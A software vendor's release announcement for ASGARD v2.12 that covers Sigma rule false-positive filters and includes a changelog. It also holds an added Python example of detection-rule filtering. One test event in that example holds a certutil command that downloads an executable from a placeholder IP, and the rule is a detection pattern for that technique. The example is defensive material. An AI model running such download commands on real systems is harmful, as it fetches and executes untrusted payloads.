ASGARD v2.12 Released

by Florian Roth, Jan 24, 2022

The new ASGARD Management Center version 2.12 adds new features and fixes several issues that were introduced with version 2.11 in December 2021.

Better Sigma Rule Management

We’ve added new features and improved the usability of the Sigma rule management section, which is relevant for the already released Log Watcher agent and for beta customers testing our new Aurora agent.

The most important new features are the false positive filter and the response editor. The response editor allows Aurora customers to configure response actions for a triggering rule.

The false positive filter lets users add filters that extend a rule at deployment time instead of modifying the original rule. An updated upstream rule can therefore be rolled out with the same custom filter values, which are only relevant in the user’s environment. Keep such filters as narrow as possible: an over-broad filter silently suppresses true positives for every future version of the rule as well.
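The mechanism described above, as an added example in Python that is not ASGARD code and not part of the original post: a constructed upstream Sigma rule (written as a Python dict rather than the YAML file it would really be) is extended with a site-local filter at deployment time, and a minimal matcher for the `selection`/`filter` subset of the Sigma syntax is run over three constructed process-creation events to show that the filter suppresses the known false positive while the upstream rule object stays untouched. The rule, the filter name `filter_local_fp`, the events and the tiny matcher are all assumptions for illustration; ASGARD’s internal filter format is not shown on the page.

```python
import copy

# Constructed upstream Sigma rule, in dict form (a real rule is a YAML file with the same keys).
UPSTREAM_RULE = {
    "title": "Suspicious certutil Download (constructed example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains": "urlcache",
        },
        "condition": "selection",
    },
    "level": "medium",
}

# Constructed site-local false-positive filter: a patch-deployment tool that
# legitimately calls certutil in this (hypothetical) environment.
FP_FILTER = {"ParentImage|endswith": "\\PatchDeploy.exe"}

# Constructed process-creation events: true positive, known false positive, unrelated.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f https://updates.example.internal/kb.cab kb.cab",
     "ParentImage": "C:\\Tools\\PatchDeploy.exe"},
    {"Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def extend_rule(rule, fp_filter, name="filter_local_fp"):
    """Return a deployment copy of `rule` whose condition excludes `fp_filter`.

    The upstream rule object is left untouched, so a newer upstream version can
    be passed through the same function and picks up the same local filter.
    """
    extended = copy.deepcopy(rule)
    detection = extended["detection"]
    detection[name] = dict(fp_filter)
    detection["condition"] = f"({detection['condition']}) and not {name}"
    return extended


def _field_matches(event, key, expected):
    """Evaluate one `Field|modifier: value` pair (case-insensitive, like Sigma)."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    expected = expected.lower()
    if modifier == "":
        return value == expected
    if modifier == "contains":
        return expected in value
    if modifier == "startswith":
        return value.startswith(expected)
    if modifier == "endswith":
        return value.endswith(expected)
    raise ValueError(f"unsupported modifier: {modifier}")


def _selection_matches(event, selection):
    """A Sigma map selection is an AND over all of its field/value pairs."""
    return all(_field_matches(event, k, v) for k, v in selection.items())


def rule_matches(rule, event):
    """Evaluate the condition subset this example produces: `A`, `(A) and not B`, ..."""
    detection = rule["detection"]
    parts = [p.strip() for p in
             detection["condition"].replace("(", "").replace(")", "").split(" and not ")]
    if not _selection_matches(event, detection[parts[0]]):
        return False
    return not any(_selection_matches(event, detection[p]) for p in parts[1:])


def evaluate(rule, events):
    """Return one True/False per event."""
    return [rule_matches(rule, e) for e in events]


if __name__ == "__main__":
    deployed = extend_rule(UPSTREAM_RULE, FP_FILTER)
    print("upstream :", evaluate(UPSTREAM_RULE, EVENTS))   # [True, True, False]
    print("deployed :", evaluate(deployed, EVENTS))        # [True, False, False]
    # Constructed upstream update: level raised and selection tightened;
    # re-applying the unchanged local filter gives the same result.
    updated = copy.deepcopy(UPSTREAM_RULE)
    updated["level"] = "high"
    updated["detection"]["selection"]["CommandLine|contains"] = "-urlcache"
    print("updated  :", evaluate(extend_rule(updated, FP_FILTER), EVENTS))  # [True, False, False]
```

The filter is keyed on the parent process rather than on the command line, so it still excludes only the deployment tool after the upstream selection changes; a filter written against the exact command line would have to be revisited on every rule update.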

Revised Updates Section

The update section for scanners and signatures has been revised and each action has been reworked. Users can now trigger an update manually and check the log of the update process in a separate tab.

Full change log:

– Feature: Support Aurora Agent (Beta Only)
– Feature: Manage Sigma Responses and False Positives (Aurora Only)
– Feature: Enable / Disable Sigma Rules
– Feature: Manually check for THOR and Signature Updates
– Feature: Show log of previous update process
– Feature: Auto Config for Sigma Rulesets (Automatically add new Sigma Rules based on level)
– Feature: The UI now has a lot more indicators for e.g. ‘Asset Requests’, ‘Uncompiled Rulesets’ and more
– Feature: Added more graphs to overview page, e.g. incoming Aurora and Log Watcher events
– Feature: Added bulk update for available Sigma rule updates
– Feature: Added default Sigma Rulesets (if no ruleset has been created yet)
– Feature: Added background routine that removes older and unused THOR / Signature versions
– Feature: Edit Scan Templates
– Feature: Search THOR Flags / Aurora Options
– Feature: Download THOR Zip with target hostname as filename
– Change: Improved Server Status indicators
– Change: Improved licensing
– Change: LDAP users now require at least one LDAP role; accounts without one can no longer authenticate
– Change: Updated Sigma rules
– Change: Cosmetics and UX improvements
– Change: Updated default THOR and Signature auto-update config
– Change: Added more links and password reset help to login page
– Change: Improved usability and feedback in IOC Management section
– Change: Require current password for password change
– Bugfix: Re-added and improved “no labels” filter in assets table
– Bugfix: Re-added resize buttons for Remote Console
– Bugfix: Fixed an issue that caused some API keys to be corrupted
– Bugfix: Fixed non-working ‘Install Service Controller’ playbook on Master ASGARD
– Bugfix: Updated interrogate job to detect ‘Windows 11’ correctly
– Bugfix: Fixed broken ‘Is Domain Controller: No’ filter
– Bugfix: Fixed missing default value when editing Sigma or YARA rules in IOC Management
– Bugfix: Fixed non-working “use newer Sigma rule” button
– Bugfix: Fixed CRLF issues in IOC Management for some IOC types
– Bugfix: Fixed some missing MISP IOCs in THOR download package
– Bugfix: Fixed file permissions that prevented the backup of ASGARD config files on Master ASGARD from working properly
– Bugfix: Fixed encryption issues with custom signatures for THOR Lite
– Bugfix: Fixed missing import in NTP config that caused NTP to not work properly on some ASGARDs
– Bugfix: Fixed tasks that remained pending forever because of an unknown task module
– Bugfix: Fixed non-working rsyslog reload after monthly log rotation
– Bugfix: Fixed wrong file extension of stdout and stderr files in group task result package

To install the update, visit the “Updates > Management Center” section. 

About the author:

Florian Roth

Florian Roth serves as the Head of Research and Development at Nextron Systems. With a background in IT security since 2000, he has delved deep into nation-state cyber attacks since 2012. Florian has developed the THOR Scanner and actively engages with the community via his Twitter handle @cyb3rops. He has contributed to open-source projects, including 'Sigma', a generic SIEM rule format, and 'LOKI', an open-source scanner. Additionally, he has shared valuable resources like a mapping of APT groups and operations and an Antivirus Event Analysis Cheat Sheet.
